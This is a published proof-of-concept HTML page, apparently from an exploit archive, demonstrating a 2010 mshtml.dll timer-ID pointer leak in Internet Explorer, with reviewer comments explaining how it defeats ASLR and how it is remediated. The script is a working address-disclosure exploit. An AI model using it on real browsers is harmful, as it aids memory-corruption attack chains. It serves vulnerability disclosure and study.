
# Title : Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak [0-Day]
# Published : 2010-07-09
# Author : Ruben Santamarta


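<html lang="en">
<!-- http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1 -->
<!-- mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com -->
<!--
  Reviewer notes
  * What the page does: each button press calls setInterval(), subtracts a
    click counter from the returned timer ID and prints the result in hex.
  * Why that matters: the HTML timer API only promises an opaque integer
    handle. The author's claim is that on the affected mshtml.dll the handle
    is derived from a pointer, so any page script can read a process address.
    An address disclosure like this weakens ASLR for whatever memory
    corruption bug it is paired with; on its own it corrupts nothing.
  * Quick check: an engine that hands out small sequential handles should
    print a small constant here instead of an address-sized value
    (presumably; behaviour varies by engine).
  * Remediation is on the browser side (a vendor update to mshtml.dll).
    The script uses only standard timer and DOM calls, so filtering on page
    content is unlikely to be a dependable control.
  * No doctype is declared and the handler stays inline, so the document
    mode and event wiring match what the author published.
-->

  <head>
    <!-- Declared so the author's name in the title renders correctly. -->
    <meta charset="utf-8">
    <title>mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Timer ID Pointer leak - Rubén Santamarta www.reversemode.com</title>

    <script type="text/javascript">
      // Click counter, starts at 1 and grows by one per button press.
      // LeakOrDie() subtracts it from every timer ID it receives.
      var i = 1;

      /**
       * Button handler: registers one more 2-second interval and displays
       * (timer ID - click counter) as a hex number in the #atun element.
       *
       * The subtraction presumably cancels a per-timer increment so that the
       * same base value is shown on every press (inferred from the code, not
       * verified here).
       */
      function LeakOrDie() {
        var t;

        // String-form setInterval is evaluated as code on every tick
        // (eval-like). Kept in the author's form so the listing matches the
        // published repro; prefer passing a function reference elsewhere.
        // The interval is never cleared: every press leaves one more timer
        // running the no-op foo().
        t = setInterval("foo()", 2000);
        t -= i;

        // innerHTML receives only constant markup plus the hex form of a
        // number, so no untrusted input reaches the DOM here.
        document.getElementById('atun').innerHTML = '<b> Pointer leaked:</b> ' + '0x' + t.toString(16);
        i++;
      }

      /**
       * Timer callback. Intentionally empty: only the ID returned by
       * setInterval() is of interest, not the work done on each tick.
       */
      function foo() {
        return;
      }
    </script>
  </head>

  <body>
    <input type="button" value="Press to leak" onclick="LeakOrDie();">

    <br><br>

    <!-- Output area: LeakOrDie() overwrites its contents on each press. -->
    <div id="atun"></div>
  </body>

</html>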